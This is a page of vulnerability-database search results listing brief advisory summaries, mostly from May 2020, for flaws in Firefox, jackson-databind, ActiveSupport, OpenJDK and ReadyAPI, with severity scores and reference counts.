Lucene search
K

4276 matches found

OSV
OSV
added 2020/05/28 12:0 p.m.16 views

RUSTSEC-2020-0017 Use after free in ArcIntern::drop

ArcIntern::drop has a race condition where it can release memory which is about to get another user. The new user will get a reference to freed memory. This was fixed by serializing access to an interned object while it is being deallocated. Versions prior to 0.3.12 used stronger locking which...

8.1CVSS7.9AI score0.00957EPSS
Exploits1References3
OSV
OSV
added 2020/05/26 6:15 p.m.3 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox 76...

9.8CVSS7.4AI score0.01582EPSS
Exploits0References2
NVD
NVD
added 2020/05/26 6:15 p.m.17 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox 76...

9.8CVSS8.8AI score0.01582EPSS
Exploits0References2
Prion
Prion
added 2020/05/26 6:15 p.m.18 views

Security feature bypass

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox 76...

7.5CVSS8.8AI score0.01582EPSS
Exploits0References2Affected Software1
Cvelist
Cvelist
added 2020/05/26 5:3 p.m.22 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox 76...

8.8AI score0.01582EPSS
Exploits0References2
CVE
CVE
added 2020/05/26 5:3 p.m.197 views

CVE-2020-12390

CVE-2020-12390 affects Firefox versions prior to 76. The root cause is incorrect origin serialization of URLs containing IPv6 addresses, which could cause security checks to be bypassed or misjudged. The vulnerability is documented in Mozilla advisory mfsa2020-16 and related bug reports, with pub...

9.8CVSS8.6AI score0.01582EPSS
Exploits0References2Affected Software1
Debian CVE
Debian CVE
added 2020/05/26 5:3 p.m.26 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox 76...

9.8CVSS9.5AI score0.01582EPSS
Exploits0
AlpineLinux
AlpineLinux
added 2020/05/26 5:3 p.m.40 views

CVE-2020-12390

Incorrect origin serialization of URLs with IPv6 addresses could lead to incorrect security checks. This vulnerability affects Firefox 76...

9.8CVSS8.9AI score0.01582EPSS
Exploits0
RedHat Linux
RedHat Linux
added 2020/05/26 4:9 p.m.4 views

jackson-databind: Serialization gadgets in org.apache.commons.dbcp.datasources.*

A flaw was discovered in FasterXML jackson-databind, where it would permit polymorphic deserialization of malicious objects using the commons-dbcp gadget when used in conjunction with polymorphic type handling methods such as enableDefaultTyping or when @JsonTypeInfo is using Id.CLASS or...

9.8CVSS7.4AI score0.05681EPSS
Exploits0References4
RedHat Linux
RedHat Linux
added 2020/05/26 3:50 p.m.2 views

jackson-databind: Serialization gadgets in commons-jelly:commons-jelly

A flaw was found in jackson-databind 2.x. The interaction between serialization gadgets and typing is mishandled. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability...

8.1CVSS7.1AI score0.05594EPSS
Exploits0References4
RedHat Linux
RedHat Linux
added 2020/05/26 3:50 p.m.71 views

Important: Red Hat Security Advisory: rh-maven35-jackson-databind security update

An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for eac...

8.1CVSS7.2AI score0.05594EPSS
Exploits0References3
RedHat Linux
RedHat Linux
added 2020/05/26 3:50 p.m.3 views

jackson-databind: Serialization gadgets in org.springframework:spring-aop

A flaw was found in jackson-databind 2.x. The interaction between serialization gadgets and typing is mishandled. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability...

8.1CVSS7.1AI score0.03607EPSS
Exploits0References4
Github Security Blog
Github Security Blog
added 2020/05/26 2:49 p.m.75 views

ActiveSupport potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore

In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when untrusted user input is written to the cache store using the raw: true parameter, re-reading the result from the cache can evaluate the user input as a Marshalled object instead of pla...

9.8CVSS9AI score0.45732EPSS
Exploits5References13Affected Software1
RedHat Linux
RedHat Linux
added 2020/05/20 5:35 p.m.2 views

OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE component: Serialization. Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via...

4.3CVSS7.3AI score0.04211EPSS
Exploits0References4
RedHat Linux
RedHat Linux
added 2020/05/20 4:46 p.m.104 views

Important: Red Hat Security Advisory: java-1.7.1-ibm security update

An update for java-1.7.1-ibm is now available for Red Hat Enterprise Linux 6 Supplementary. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each...

8.3CVSS6.7AI score0.0623EPSS
Exploits0References9
RedHat Linux
RedHat Linux
added 2020/05/20 4:26 p.m.4 views

OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE component: Serialization. Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via...

4.3CVSS7.3AI score0.04211EPSS
Exploits0References4
RedHat Linux
RedHat Linux
added 2020/05/20 3:10 p.m.5 views

OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE component: Serialization. Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via...

4.3CVSS7.3AI score0.04211EPSS
Exploits0References4
Veracode
Veracode
added 2020/05/19 5:34 a.m.29 views

Remote Code Execution

jackson-databind is vulnerable to remote code execution. The vulnerability exists as the untrusted classes org.apache.activemq. were not filtered by default from the interaction between serialization gadgets and polymorphic typing...

8.8CVSS3.8AI score0.03489EPSS
Exploits0References9Affected Software4
Packet Storm
Packet Storm
added 2020/05/19 12:0 a.m.343 views

Protection Licensing Toolkit ReadyAPI 3.2.5 Code Execution / Deserialization

Advisory ID: SYSS-2019-039 Product: Protection Licensing Toolkit, SoapUI/LoadUI/ServiceV Pro Manufacturer: jProductivity LLC, SmartBear Software Affected Versions: - ReadyAPI 3.2.5 Tested Versions: ReadyAPI 3.2.5 Vulnerability Type: Unsafe deserialization/remote code execution CWE-502 Risk Level:...

0.5AI score0.117EPSS
Exploits3
IBM Security Bulletins
IBM Security Bulletins
added 2020/05/18 9:14 p.m.53 views

Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM InfoSphere Information Server

Summary There are multiple vulnerabilities in the IBM® SDK Java™ Technology Edition, Versions 7 and 8 that are used by IBM InfoSphere Information Server. These issues were disclosed as part of the IBM Java SDK updates in October 2019 and January 2020. Vulnerability Details CVEID: CVE-2020-2593...

7.2CVSS1.2AI score0.0404EPSS
Exploits0Affected Software1
Rows per page
Query Builder